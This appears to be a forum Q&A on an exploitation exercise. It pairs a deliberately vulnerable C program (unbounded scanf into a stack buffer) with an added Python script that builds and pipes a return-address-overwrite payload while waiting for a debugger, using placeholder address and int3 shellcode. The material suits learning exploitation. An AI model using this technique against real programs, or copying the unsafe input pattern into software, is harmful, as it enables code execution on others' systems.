
I'm trying to exploit a buffer overflow vulnerability in a C program. I have control of EIP, but I don't know how to send the payload to the program. Here's the source:

#include <cstdio>

int main() {
    char name[32];                                  /* 32-byte stack buffer */
    printf("Enter your name and press ENTER\n");
    scanf("%s", name);                              /* no length limit: input longer than 32 bytes overflows name */
    printf("Hi, %s!\n", name);
    return 0;
}

How can I insert the payload (BUFF + EIP + NOPs + Shellcode) into the name variable? On Linux it's something like $(python -c 'print "BUFF + EIP + NOPs + Shellcode"'); how can I do this in Windows? If possible, with a Python script.

Thanks.

1 Answer


If pipe functionality is not available, you can use a temporary file to pipe the payload.

As in:

python -c "print 'BUFF + EIP + NOPs + Shellcode'" > payload.txt
vulnerable_binary.exe < payload.txt

11 Comments

Thank you, I can do it in cmd.exe; however, in Immunity, passing < payload.txt as an argument doesn't work.
In that case you can start the process externally from cmd and then attach Immunity to it.
Also, while selecting files to run with Immunity you can specify command line arguments. You can try giving < payload.txt there.
If I use vulnerable_binary.exe < payload.txt, the program terminates before I can attach to it in Immunity.
For this exercise I have the source code; however, I need a working solution for when the source is not available. Thank you for all your help.
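Putting the answer and the comment thread together, here is an added Python script (not part of the original answer) that builds BUFF + EIP + NOPs + shellcode, checks it for bytes that scanf("%s") or a Windows text-mode stdin would mangle, writes it to payload.txt in binary mode, and starts the target with its stdin on a pipe, pausing so the debugger can be attached before the overflowing input is delivered. The executable name vulnerable_binary.exe, the offset of 44 bytes, the return address 0xdeadbeef and the int3 placeholder shellcode are all assumptions, not values for any real target.

```python
# Added example, not from the original answer. Everything target-specific
# (executable name, offset, return address, shellcode) is a placeholder.
import struct
import subprocess
import sys

# Bytes that will not reach the buffer intact: scanf("%s") stops at C
# whitespace, and the Windows CRT treats 0x1A (Ctrl-Z) as EOF on a text-mode
# stdin. 0x00 is included because most shellcode also breaks on it.
BAD_CHARS = frozenset(b"\x00\x09\x0a\x0b\x0c\x0d\x20\x1a")


def build_payload(buf_size, eip, nop_count, shellcode, filler=b"A"):
    """Return BUFF + EIP + NOPs + shellcode as bytes.

    buf_size is the number of filler bytes needed to reach the saved return
    address. It comes from the crash offset, not from sizeof(name): the
    compiler may pad the frame, so 32 is not a safe assumption.
    eip is written little-endian, the byte order the x86 stack stores it in.
    """
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    payload = filler * buf_size
    payload += struct.pack("<I", eip)
    payload += b"\x90" * nop_count          # NOP sled
    payload += shellcode
    return payload


def find_bad_chars(payload):
    """Return the offsets of bytes that would be mangled before reaching the buffer."""
    return [i for i, b in enumerate(payload) if b in BAD_CHARS]


def write_payload(path, payload):
    """Write the payload for use with 'vulnerable_binary.exe < payload.txt'."""
    # Binary mode is essential: a text-mode file (or Python 2's print on
    # Windows) rewrites 0x0A as 0x0D 0x0A and silently corrupts the payload.
    with open(path, "wb") as f:
        f.write(payload)
    return len(payload)


def run_target(exe, payload):
    """Start the target with stdin on a pipe, wait for a debugger to attach, then send."""
    # The process blocks in scanf() until we write, so it stays alive long
    # enough to attach Immunity to the printed PID.
    proc = subprocess.Popen([exe], stdin=subprocess.PIPE)
    print("Target PID %d started; attach the debugger, then press ENTER" % proc.pid)
    sys.stdin.readline()
    # scanf("%s") needs whitespace to end the token. The newline is appended
    # here, after the shellcode, so it is never part of the payload itself.
    proc.stdin.write(payload + b"\n")
    proc.stdin.close()
    return proc.wait()


if __name__ == "__main__":
    # Placeholder values (assumed): replace with the offset, return address
    # and shellcode found for the real target.
    shellcode = b"\xcc" * 4                 # int3 breakpoints stand in for shellcode
    payload = build_payload(buf_size=44, eip=0xDEADBEEF, nop_count=16, shellcode=shellcode)
    bad = find_bad_chars(payload)
    if bad:
        sys.exit("bad characters at offsets %s: fix the payload first" % bad)
    write_payload("payload.txt", payload)
    run_target("vulnerable_binary.exe", payload)
```

The pause in run_target is what addresses the "terminates before I can attach" problem: redirection via the shell delivers the whole file the instant the process starts, whereas a pipe lets the script decide when the input arrives. The same script also covers the Immunity-argument issue, since "<" is interpreted by cmd.exe, not by the target, so it cannot be passed as a command-line argument at all.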
